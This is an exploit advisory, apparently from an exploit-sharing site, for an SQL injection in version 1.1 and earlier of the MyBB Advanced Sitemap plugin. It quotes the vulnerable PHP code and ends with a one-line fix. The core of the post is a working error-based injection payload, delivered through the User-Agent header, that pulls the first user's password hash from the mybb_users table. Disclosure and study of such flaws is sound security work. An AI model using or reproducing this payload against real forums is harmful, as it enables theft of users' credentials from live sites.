MyBB Plugin Advanced Sitemap <= 1.1 SQL injection

Download | Vote Up (0) | Vote Down (0) 
# Exploit Title: MyBB Plugin Advanced Sitemap <= 1.1 SQL injection
# Date: 19/01/2013
# Exploit Author: Kallimero
# Vendor Homepage: http://mods.mybb.com/view/sitemap
# Version: 1.1
# Tested on: Debian



Vulnz
========

The mybb plugin named Advanced Sitemap is vulnerable to a sql injection.



---------------[sitemap.php]---------------
<?php
$db->insert_query("sitemap_crawls",

                        array(
                                "useragent" => $_SERVER['HTTP_USER_AGENT'],
                                "remoteip" => getRemoteIP(),
                                "timestamp" => time()
                        )

                 );
?>
---------------[sitemap.php]---------------

Really simple. the user agent let us inject some SQL payload.
(modifyHeaders is a nice firefox add-on which can be used in order to customize your headers, as the user agent).

Here is the PoC (error-based):
user_agent=',(select 1 from (select count(*),concat((SELECT password FROM mybb_users LIMIT 0,1),0x7e, floor(rand(0)*3)) as e from information_schema.tables group by e) a))-- -
Then go to http://[site]/sitemap.php



How to Fix ?
============


A simple $db->escape_string() on the vulnerable fields would fix it.
Never trust http headers...

Thanks
=========

All hwc members : Necromoine, fr0g, AppleSt0rm, St0rn, Zhyar, k3nz0, gr4ph0s.
Please visit : http://hwc-crew.org/

Groucho

Be the first to give feedback !
Please login to comment !